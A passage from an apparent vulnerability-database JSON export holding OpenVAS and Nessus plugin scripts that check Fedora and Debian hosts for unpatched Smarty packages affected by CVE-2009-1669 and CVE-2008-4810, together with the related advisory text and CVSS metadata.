modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5516\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5516.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64079\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-5516 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5520.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64080", "href": "http://plugins.openvas.org/nasl.php?oid=64080", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-5520 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5520.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5520 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5520\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5520.\";\n\n\n\nif(description)\n{\n script_id(64080);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-5520 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "description": "The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5525.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64078", "href": "http://plugins.openvas.org/nasl.php?oid=64078", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-5525 (php-Smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5525.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5525 (php-Smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nCVE-2009-1669\n\nChangeLog:\n\n* Mon May 25 2009 Christopher Stone 2.6.25-1\n- Upstream sync\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update php-Smarty' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5525\";\ntag_summary = \"The remote host is missing an update to php-Smarty\nannounced via advisory FEDORA-2009-5525.\";\n\n\n\nif(description)\n{\n script_id(64078);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-5525 (php-Smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501564\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php-Smarty\", rpm:\"php-Smarty~2.6.25~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:05:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "The remote host is missing an update to smarty\nannounced via advisory DSA 1919-2.", "modified": "2018-01-03T00:00:00", "published": "2010-08-21T00:00:00", "id": "OPENVAS:136141256231067847", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067847", "type": "openvas", "title": "Debian Security Advisory DSA 1919-2 (smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1919_2.nasl 8274 2018-01-03 07:28:17Z teissa $\n# Description: Auto-generated from advisory DSA 1919-2 (smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A regression was found in the patch applied in DSA 1919-1 to smarty,\nwhich caused compilation failures on some specific templates. This\nupdate corrects the fix. For reference, the full advisory text below.\n\nSeveral remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\nThe _expand_quoted_text function allows for certain restrictions in\ntemplates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\nThe smarty_function_math function allows context-dependent attackers\nto execute arbitrary commands via shell metacharacters in the equation\nattribute of the math function.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.6.20-1.3.\n\nThe testing (squeeze) and unstable distribution (sid) are not affected\nby this regression.\n\nWe recommend that you upgrade your smarty package.\";\ntag_summary = \"The remote host is missing an update to smarty\nannounced via advisory DSA 1919-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201919-2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67847\");\n script_version(\"$Revision: 8274 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 08:28:17 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-21 08:54:16 +0200 (Sat, 21 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-4810\", \"CVE-2009-1669\");\n script_name(\"Debian Security Advisory DSA 1919-2 (smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.20-1.3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "The remote host is missing an update to smarty\nannounced via advisory DSA 1919-1.", "modified": "2018-04-06T00:00:00", "published": "2009-10-27T00:00:00", "id": "OPENVAS:136141256231066103", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066103", "type": "openvas", "title": "Debian Security Advisory DSA 1919-1 (smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1919_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1919-1 (smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\nThe _expand_quoted_text function allows for certain restrictions in\ntemplates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\nThe smarty_function_math function allows context-dependent attackers\nto execute arbitrary commands via shell metacharacters in the equation\nattribute of the math function.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 2.6.14-1etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.20-1.2.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your smarty package.\";\ntag_summary = \"The remote host is missing an update to smarty\nannounced via advisory DSA 1919-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201919-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66103\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2008-4810\", \"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1919-1 (smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.14-1etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.20-1.2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "The remote host is missing an update to smarty\nannounced via advisory DSA 1919-1.", "modified": "2017-07-07T00:00:00", "published": "2009-10-27T00:00:00", "id": "OPENVAS:66103", "href": "http://plugins.openvas.org/nasl.php?oid=66103", "type": "openvas", "title": "Debian Security Advisory DSA 1919-1 (smarty)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1919_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1919-1 (smarty)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\nThe _expand_quoted_text function allows for certain restrictions in\ntemplates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\nThe smarty_function_math function allows context-dependent attackers\nto execute arbitrary commands via shell metacharacters in the equation\nattribute of the math function.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 2.6.14-1etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.20-1.2.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your smarty package.\";\ntag_summary = \"The remote host is missing an update to smarty\nannounced via advisory DSA 1919-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201919-1\";\n\n\nif(description)\n{\n script_id(66103);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2008-4810\", \"CVE-2009-1669\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1919-1 (smarty)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.14-1etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"smarty\", ver:\"2.6.20-1.2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-12T10:07:22", "description": "This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-05-28T00:00:00", "title": "Fedora 10 : php-Smarty-2.6.25-1.fc10 (2009-5525)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "modified": "2009-05-28T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:php-Smarty"], "id": "FEDORA_2009-5525.NASL", "href": "https://www.tenable.com/plugins/nessus/38937", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5525.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38937);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1669\");\n script_bugtraq_id(34918);\n script_xref(name:\"FEDORA\", value:\"2009-5525\");\n\n script_name(english:\"Fedora 10 : php-Smarty-2.6.25-1.fc10 (2009-5525)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501564\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/024175.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70c49c60\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-Smarty package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-Smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"php-Smarty-2.6.25-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-Smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:22", "description": "This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2009-05-28T00:00:00", "title": "Fedora 11 : php-Smarty-2.6.25-1.fc11 (2009-5520)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "modified": "2009-05-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-Smarty", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-5520.NASL", "href": "https://www.tenable.com/plugins/nessus/38935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5520.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38935);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1669\");\n script_xref(name:\"FEDORA\", value:\"2009-5520\");\n\n script_name(english:\"Fedora 11 : php-Smarty-2.6.25-1.fc11 (2009-5520)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - 